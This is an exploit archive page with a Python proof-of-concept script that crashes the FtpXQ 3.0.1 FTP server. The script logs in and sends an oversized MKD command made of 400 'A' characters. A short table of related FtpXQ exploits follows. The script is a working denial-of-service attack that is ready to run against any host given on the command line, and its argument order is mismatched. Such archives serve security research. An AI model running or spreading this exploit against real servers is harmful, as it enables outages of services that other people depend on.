#!/usr/bin/python banner=( "*************************\r\n" "* Exploit Title: FtpXQ authenticated remote Dos " "* (trial on http://www.datawizard.net/Products/FtpXQ/Setup.EXE) Version 3.0.1 \r\n" "* Tested on XP sp2 english" "* Needs write access --> vuln on MKD command\r\n" "* Vulnerability found by Marc Doudiet\r\n" "* For educational purpose only\r\n" "* Proof of concept code\r\n") import socket import sys def Usage(): print ("Usage: ./ftpxq.py <Username> <password> <host>\n") string="A"*400 def start(username, password, hostname): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print banner try: s.connect((hostname, 21)) print "[-] Connecting to the FTP ..." except: print ("[-] Connection error!") sys.exit(1) s.recv(1024) s.send('USER '+username+'\r\n') s.recv(1024) s.send('PASS '+password+'\r\n') s.recv(1024) print "[-] Sending evil buffer ...\r\n" s.send('MKD '+string+'\r\n') if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] start(hostname,username,passwd) print "[-] Exploit seems to work" sys.exit(0)
Related Exploits
Trying to match setup file: 689c18f81065e027d5b1dbd599294084Other Possible E-DB Search Terms: FtpXQ 3.0, FtpXQ
Date | D | V | Title | Author |
---|---|---|---|---|
2006-10-24 |
![]() |
FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service | Federico Fazzi | |
2009-09-14 |
![]() |
FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service | PLATEN | |
2001-02-28 |
![]() |
datawizards ftpxq 2.0.93 - Directory Traversal | joetesta |